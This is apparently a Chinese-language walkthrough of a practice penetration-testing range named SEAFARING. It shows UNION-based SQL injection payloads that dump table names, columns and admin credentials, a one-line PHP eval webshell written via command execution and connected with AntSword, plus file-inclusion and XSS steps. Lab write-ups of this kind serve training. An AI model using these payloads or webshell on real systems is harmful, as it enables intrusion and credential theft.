SEAFARING靶场渗透

一.SQL注入漏洞

1.输入id=1 --+ 下方出现数据说明闭合成功

2.测试得出数据库有三列

3.三处都是回显点

4.联合查询爆出库名

5.查表名

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='test'--+

6.查字段名

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='test' and table_name='admin'--+

7. 查出用户名和密码

?id=-1 union select 1,group_concat(user_name,'~',user_pass),3 from admin--+

二.文件上传漏洞

1.用我们刚才获取的用户名和密码登录后发现可以上传文件

2.上传一句话木马进去

3.将文件地址拼接到网址后进行访问

4.使用蚁剑连接

三.命令执行漏洞

1.网址下方的输入框提示我们可以执行命令

2.尝试输入ls有效

3.借助这个漏洞我们写一句话木马到888.php 并访问

echo '<?php @eval($_POST[cmd]);?>' > 888.php

4.复制地址用蚁剑连接

四.文件包含漏洞

1.修改刚才传入的888.php内容为phpinfo();重新上传访问后发现远程文件包含是关闭的,只能使用本地文件包含

2.访问php文件复制地址蚁剑连连接即可

五.XSS漏洞

在登录框中测试有没有XSS漏洞,成功弹窗

相关推荐
Lxinccode13 小时前
AI编程(3) / claude code[3] : 更新apiKey
java·数据库·ai编程·claude code
数据知道13 小时前
MongoDB数据类型全景:String、Number、Date、Boolean 及特殊的 null 类型处理
数据库·mongodb
醉颜凉15 小时前
PostgreSQL 模式(SCHEMA)详解:数据库对象的命名空间管理
数据库·postgresql
AI题库15 小时前
PostgreSQL 18 默认密码修改全指南:从安装到安全加固
数据库·安全·postgresql
七夜zippoe15 小时前
告别SQL恐惧症:我用飞算JavaAI的SQL Chat,把数据库变成了“聊天室”
java·数据库·sql·ai·javaai
半桔15 小时前
【MySQL数据库】SQL 查询封神之路:步步拆解核心操作,手把手帮你解锁高阶玩法
linux·数据库·sql·mysql·adb·oracle
猫头虎15 小时前
[精选] 2025最新MySQL和PostgreSQL区别、迁移、安全、适用场景全解析
运维·数据库·mysql·安全·postgresql·云原生·容器
No8g攻城狮15 小时前
【SQL】MySQL中空值处理COALESCE函数
数据库·sql·mysql·postgresql·sqlserver
keyborad pianist16 小时前
MySQL篇 Day1
数据库·mysql
数据知道16 小时前
MongoDB投影:如何只查询需要的字段,减少网络传输开销?
网络·数据库·mongodb